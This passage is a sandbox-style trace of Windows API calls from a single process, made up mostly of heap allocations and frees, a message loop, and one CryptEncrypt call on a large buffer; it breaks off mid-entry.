[0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0173.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0173.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50aa0 [0173.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0173.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.028] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54508 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0173.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0173.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0173.029] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40e1020*, pdwDataLen=0x8cef60*=0xf0c00, dwBufLen=0xf0c08 | out: pbData=0x40e1020*, pdwDataLen=0x8cef60*=0xf0c08) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0173.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0173.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0173.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0173.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0173.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0173.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0173.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0173.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0173.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0173.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0173.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0173.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0173.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0173.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0173.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0173.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0173.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0173.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0173.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0173.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0173.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0173.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0173.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0173.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0173.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0173.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0173.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0173.491] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0173.491] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0173.491] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0173.491] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0173.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0173.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0173.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0173.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0173.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0173.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0173.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0173.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0173.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0173.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0173.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0173.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0173.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0173.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x41ed020 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0173.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0173.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0173.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0173.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0173.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x42e1020 [0173.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x41ed020 | out: hHeap=0x970000) returned 1 [0173.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0173.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0173.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0173.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0173.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0173.644] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0173.644] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0173.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0173.644] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0173.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0173.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0173.645] HeapFree (in: hHeap=0x970000, 